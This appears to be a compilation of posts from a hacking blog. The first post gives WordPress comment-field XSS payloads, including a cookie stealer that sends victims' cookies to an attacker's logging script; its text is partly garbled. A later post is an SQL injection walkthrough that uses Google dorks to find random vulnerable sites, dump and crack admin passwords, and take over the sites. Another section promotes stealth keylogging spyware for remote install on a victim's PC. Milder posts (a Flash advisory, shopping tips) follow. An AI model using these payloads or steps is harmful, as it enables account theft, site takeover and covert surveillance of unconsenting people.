Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.

How does it work?

Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection

Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>

Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>

Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>

Solution:

Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did

According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24×7 to make it as secure as possible but the hackers are also working 24×7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.

Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of “A beginners Guide To Ethical Hacking”, has the answer to your question with his newly created “Facebook Hacking Course“.

Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.

Now before you make your decision lets hear some words from Rafay: “Friends, if you ask me “Is Facebook safe?” my answer would be “Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.”

Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.

How to get the Facebook Hacking Course?

You can get this Facebook hacking course from Here.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.

4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.

If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

• You can download havij from here.
• We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

• Just search google using one of the dork and you will see a lot of vulnerable websites.
• Open any one of the website than put  ‘ after the link look:

• If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.

  

• Now open Havij and paste the link without ‘

  

  

• Now we have to find the columns of the database.

  

  

• After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on Cracking MD5.

• After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.
• Now you may login as the admin user and control the website as you want.
• H@ppy H@cking

Video Tutorial

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.

Sniper Spy

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!

Features

• Remotely Deployable : It means you don’t need to have access of the system on which you need to install it.
• Invisibility Stealth Mode : It can work in invisible mode without the knowledge of the victim.
• Record Login Credentials : It can Records any Password for any Email account or login details of the victim on any website. This can give you access to the victims email or any other web account.

  

• Real Time Screen Viewer : You can see all the activities that is taking place on the victim’s PC.
• Remote Reboot/Shutdown : You can also remotely reboot or shutdown the PC or choose to logoff the current Windows user.
• Bypass Any Firewall : The best part of this software is that it can completely undetectable by any Firewall available till now.
• Actual Screenshots : Captures a full-size jpg picture of the active window however often you wish.
• Websites Visited : Records all website URLs visited in Internet Explorer and Firefox with page title.
• Keystrokes in Most Languages : Every keystroke typed into ANY window is logged, including passwords typed.
• PC Location Mapping : Logs the IP at each upload to show you physical locations of the PC on a map.
• Full Chat Conversations : Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.



• Applications Executed : Records every application executed by the user including full path and username.
• Application Session Durations : Shows you how long each application was used including start time and stop time.
• Automatic User File Uploads : Uploads an *actual copy* of every document, picture or desktop file changed.
• File / Folder Changes : Each time a file or folder changes, the software records the action and the full path.

Download

Click Here to buy this Amazing Software Right Now.

Click Here to go to the Official Website of this Software.

By now you might be knowing Rafay Baloch the writer of the previous article “Hack a Website Using Remote File Inclusion” and I am sure you would like to have more hacking stuff from him. Well now you don’t have to wait for him to post individual articles because he has compiled an E-book which contains all the interesting hacks. The best part of this e-book is that he has written it in such a manner that even a 5th grade kid can become a Hacker.

Apart from Hacking stuff, this book will also teach you the security aspect and after that you don’t have to worry about being hacked by other hackers.

What is in it for you?

Special Offers for you

Download

Click Here to go to the Official Website of this E-Book.

Click Here to Buy this E-book Right Now

A lot of eyes have been on Adobe since last week, when yet another remote code execution vulnerability affecting Flash Player, as well as Adobe Reader and Acrobat, was announced. Worse yet, the bug was discovered in the wild, meaning it posed an immediate threat to users.

Earlier this week, the company revealed plans to release a patch by June 10, a promise it met yesterday by shipping the first stable version of Flash Player 10.1. This release marks the end of the 10.0.x branch, as well as the end of support for PowerPC G3, 10.1.53.64 being the last version to work on this architecture.

The Security Bulletin accompanying the release names no less than 32 security issues that the new Adobe Flash Player 10.1.53.64 addresses. The vast majority of these vulnerabilities can facilitate arbitrary code execution and affect Adobe AIR as well – for which a new version (2.0.2.12610) was also released.

The Adobe Flash Player update is only available for Windows, Mac and Linux operating systems, with the Solaris version being still in the beta stage of development. A new version for the 9.0.x branch, namely 9.0.277.0, has also been released, to accommodate scenarios where upgrading to 10.1 will break functionality.

Flash Player 10.1 has been a long-awaited release, mainly because it introduces GPU hardware acceleration, a feature that takes the load off CPUs during HD SWF playback, finally allowing for such content to be properly watched on netbooks and other low-performance devices. The video-streaming experience has also been improved, the player automatically adapting the stream quality in real time according to network conditions.

The latest version of Adobe Flash Player 10.1.53.64 can be downloaded from here.

The older version of Adobe Flash Player 9.0.277.0 can be downloaded from here.

The latest version Adobe AIR 2.0.2.12610 for Windows can be downloaded from here.

A new attack on a Flash bug has surfaced that would give attackers control of a victim’s computer after crashing it, reports PC World. Adobe put out a Security Advisory about this on June 4. It is categorized as a critical issue and all operating systems with Flash are vulnerable including Windows, Linux, and Apple and it is also found in the recent versions of Reader and Acrobat.

Affected Versions

The affected versions are Adobe Flash Player 10.0.45.2, 9.0.262, and earlier 10.0.x and 9.0.x versions for Windows, Macintosh, Linux and Solaris. Adobe Reader and Acrobat 9.3.2 and earlier 9.x versions for Windows, Macintosh and UNIX. The versions that avoided being affected are Flash Player 10.1 release candidate, link available in the Adobe security advisory, and Acrobat/Reader version 8.x.

Current Situation

The attack isn’t widespread in the wild yet, Adobe has only received two reports of online attacks. Of course the attack is new and may just be starting to ramp up. Adobe will update the advisory when a schedule has been determined for creating a fix.

How to avoid it?

Until the fix is ready, Adobe has advised the Flash users that they should use the 10.1 release candidate to avoid attack where as Acrobat and Reader 9.x users can downgrade to version 8 or deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat 9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF file that contains SWF content. The authplay.dll that ships with Adobe Reader and Acrobat 9.x for Windows is typically located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll for Adobe Reader or C:\Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll for Acrobat.

Shopping online isn’t just as safe as handing over your credit card in a store or restaurant. However, if you take care of few things it can be a safe deal. Following are the things you should take care of:

1. Never respond to an email request for credit card details. All reputable companies will conduct transactions with you over a secure website connection.
2. Remember to never respond to any email advertisement, and only visit sites you know or have book marked, and verify the address before browsing further.
3. Only buy from trusted brands and websites.
4. To ensure that you only do business with legitimate companies check to see if they have a contact number, an actual retail store and a printed catalogue to browse.
5. Check a website’s returns and privacy policy before going ahead with a purchase.
6. Check that you are entering your details through a secure payment connection. You should notice when you click through to the transaction page of a company’s website that the URL in the address bar begins https:// (instead of the normal http://). This is the standard encrypted communication mechanism on the internet and means that your credit card details are being sent securely.
7. Beware of deals that seem too good to be true.
8. Beware of the limitations of the internet. The internet may not the best place to buy clothes or other products you need to see, touch or try on.
9. All reputable websites use secure payment systems. These are either a company’s own system or a 3rd party system such as Worldpay or Paypal.
10. When conducting a transaction over the internet, look for the yellow padlock in the grey status bar at the bottom of your browser page. This is an indication that the transaction is being conducted over a secure connection.
11. As an extra precaution check to see if there’s a gold lock at the bottom of the right hand corner of the browser. If they don’t include any of these reliable indicators, you might want to think twice before handing over your credit card number.
12. To be on the safe side, and avoid Internet fraudsters, it’s also a good idea to install and use security software such as Kaspersky Internet Security. It can provide you with industry-leading security services that will provide you more protection against the latest threats.

I know that its been very long since I have posted anything for you. So first of all I am really very sorry this delay but I assure you that from now  on it won’t be like that. And to make up for this delay I am posting a nice tutorial which can help you secure your private stuff.

Do you have any private stuff that you would to hide from your friends and relatives? Would you want it to be Invisible so that it remains unnoticed by the normal users? But there are software which can display all the folders that are present on the Disk. So What if you can even  password protect your folder? I guess having your private folder password protected as well as invisible should be secure enough. But you might think that you may need to have a software for that. Well here is a way to do that without using any additional software and you can show off in front of your friends by making their folders invisible as well as password protected. Here is is step by step procedure to create a password protected folder.

How to create a Password Protected Folder

1. Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.

2. Now in this folder place all the important files, documents or any folders that you want to password protect.

3. Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.

4. Now a new compressed zipped folder gets created next this folder (ABC) with the same name.

5. Double-click on this compressed zipped folder and you should see your original folder (ABC) here.

6. Now goto the File menu and select the option Add a password.

ie: File -> Add a password

Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible

1. Now Right-click on this password protected folder and select Properties.

2. At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).

3. In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options

• Do not show hidden files and folders
• Show hidden files and folders

Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.

I hope you like this post. Pass your comments!! Cheers